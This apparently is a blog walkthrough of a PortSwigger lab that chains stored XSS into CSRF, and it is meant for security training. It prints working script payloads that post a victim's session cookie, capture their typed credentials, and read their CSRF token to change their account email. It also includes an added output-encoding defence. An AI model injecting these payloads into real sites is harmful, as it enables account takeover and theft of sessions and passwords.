Exploiting XSS to Perform CSRF


A Portswigger Lab

Marduk I Am

Welcome Back!

Lab Description:

This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to perform a CSRF attack and change the email address of someone who views the blog post comments.

You can log in to your own account using the following credentials: wiener:peter

Hint — You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, make sure you use a different email address for the final exploit you deliver to the victim.

NOTE:

I will be using Burp Suite Community Edition to help solve this lab. If you have it installed, go ahead and have it running when you access the lab.

Access the lab. For this lab, we need to log in to our fictional account with the juvenile credentials provided in the lab description: wiener:peter. On the home page click on the ‘My account’ link in the upper right corner.

Home page of blog showing where ‘My Account’ is located.

On the login page, use the credentials provided.

Click ‘Log in’.


Once logged in, you will be brought to a page that prompts you to change your email. Go ahead and change it to anything you like. We will need to catch the request in Burp to find out which parameters we are going to need when crafting the payload.

Click ‘Update email’.

You will be brought back to the same page, but notice the line that begins with ‘Your email is:’ has been updated to your new email.

‘My Account’ page showing updated email.

This payload is going to be a continuation of the payload of the previous two labs: Exploiting Cross-Site Scripting to Steal Cookies and Exploiting Cross-Site Scripting to Capture Passwords.

In the Steal Cookies lab we crafted the original payload to post the victim’s session cookie:

<!-- Original Payload -->
<script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
data.append('postId', 8); // replace number with correct postId
data.append('comment', document.cookie);
data.append('name', 'victim');
data.append('email', 'blah@email.com');
data.append('website', 'http://blah.com');

fetch('/post/comment', {
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>

In the Capture Password lab we altered it, just a bit, to have the victim unknowingly post their username and password:

<!-- Altered to post username:password -->
<input type="text" name="username">
<input type="password" name="password" onchange="dothis()">

<script>
function dothis() {
var username = document.getElementsByName('username')[0].value;
var password = document.getElementsByName('password')[0].value;
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
data.append('postId', 8); // Change '8' to correct postId
data.append('comment', `${username}:${password}`);
data.append('name', 'victim');
data.append('email', 'blah@email.com');
data.append('website', 'http://blah.com');

fetch('/post/comment', {
method: 'POST',
mode: 'no-cors',
body: data
});
}
</script>

Now, for this lab, we need to alter it again in order to change a victim’s email address without them knowing. The common thread among the three is that we use Burp Suite Community Edition to find out what parameters we need to append to our POST request.

Head over to Burp's 'Target' tab and find the 'change-email' request on the left-hand side, in the target tree. Left-click to highlight it, and you will be able to see the request on the right.

Here you can see the parameters required to make a successful email change. All we are going to need is the email address we are changing it to and the victim's CSRF token.

So, if we take our original payload and strip out all the unneeded 'data.append' lines, we should have what we need.

<!-- Unneeded lines are commented out -->
<script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
// data.append('postId', 8);
// data.append('comment', document.cookie);
// data.append('name', 'victim');
data.append('email', 'blah@email.com');
// data.append('website', 'http://blah.com');

fetch('/post/comment', {
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>

This is where we add the email address we are changing the victim's email to. We also need to change where we are sending this POST request.

<!-- Unneeded lines removed and fetch() destination changed -->
<script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
data.append('email', 'M4rdukwasH3re@EvilEmail.com');

fetch('/my-account/change-email', { // Change the fetch destination
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>

So, in short, this script will wait until the DOM is completely loaded, then it will find the victim's CSRF token by searching the document for the first element with the name 'csrf', and append its value along with the new email address to the request. Because the injected script runs inside the victim's own session on the same origin, the anti-CSRF token is just another value on the page to it, which is why the token alone does not stop this attack.

Back on our blog page navigate your way to your favorite blog post. Scroll down to find the comment form. The final payload should be pasted into the comment box.

<!-- Final payload -->
<script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
data.append('email', 'M4rdukwasH3re@EvilEmail.com');

fetch('/my-account/change-email', {
method: 'POST',
mode: 'no-cors',
body: data
});
});
</script>

You also need to fill in the other required fields: Name, Email, and Website. All can be made up, but the website needs to start with 'http://' or 'https://'.
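The root cause of this lab is that the comment body is echoed back into the page as HTML, so the script above runs in every viewer's session and can read their CSRF token straight out of the DOM. The following is an added defensive example, not code from the lab or from the original post: a comment renderer that HTML-encodes every user-controlled value before it lands in the page, and restricts the website field (which the form above requires to start with http:// or https://) to those two schemes so a rendered link can never carry a javascript: URL. The field names and the rendered markup are assumptions about how a comment form like the lab's might be built; the sample comment is the final payload from this page, embedded as a constructed input.

```javascript
// Added defensive example (not from the lab or the original post).
// Field names (name, website, comment) and the output markup are assumptions.

// HTML-encode the five characters that can change context inside element
// content or a double-quoted attribute value.
function escapeHtml(str) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept only http(s) URLs for the "website" field, so an <a href> built from
// it can never use javascript: or data:. Returns the normalised URL, or null.
function safeWebsiteUrl(input) {
  let url;
  try {
    url = new URL(String(input));
  } catch (e) {
    return null; // not a parseable absolute URL at all
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.href;
}

// Render one stored comment as an HTML fragment, encoding each value for the
// context it is inserted into (text node or attribute value).
function renderComment({ name, website, comment }) {
  const safeName = escapeHtml(name);
  const href = safeWebsiteUrl(website);
  const author = href
    ? `<a href="${escapeHtml(href)}">${safeName}</a>`
    : safeName;
  return `<p class="comment"><b>${author}</b>: ${escapeHtml(comment)}</p>`;
}

// Return the sorted set of tag names that actually appear in a fragment; a
// safely rendered comment may only contain the tags the template emits.
function tagNames(html) {
  const names = new Set();
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)) {
    names.add(m[1].toLowerCase());
  }
  return [...names].sort();
}

// Constructed sample input: the final payload from this page, as a viewer
// would submit it in the comment box.
const SAMPLE_PAYLOAD = `<script>
window.addEventListener('DOMContentLoaded', function() {
var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();
data.append('csrf', token);
data.append('email', 'M4rdukwasH3re@EvilEmail.com');
fetch('/my-account/change-email', { method: 'POST', mode: 'no-cors', body: data });
});
</script>`;

// Convenience wrapper used below: render the sample comment the way the lab's
// form would receive it.
function renderSample() {
  return renderComment({
    name: 'victim',
    website: 'http://blah.com',
    comment: SAMPLE_PAYLOAD,
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  const out = renderSample();
  console.log(out);
  console.log('tags present:', tagNames(out).join(', '));
}
```

With encoding in place the stored text is still shown to viewers verbatim, but as inert characters: the fragment contains only the p, b and a tags the template emits, and the script never executes, so the victim's CSRF token is never read. The same check is a cheap regression test to keep alongside any template that interpolates user input.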

Comment form with final payload pasted in comment box.

Click ‘Post Comment’.

Congratulations, you solved the lab

Congratulations, you solved another one! Keep up the amazing work!

See you next time! With expert-level labs!
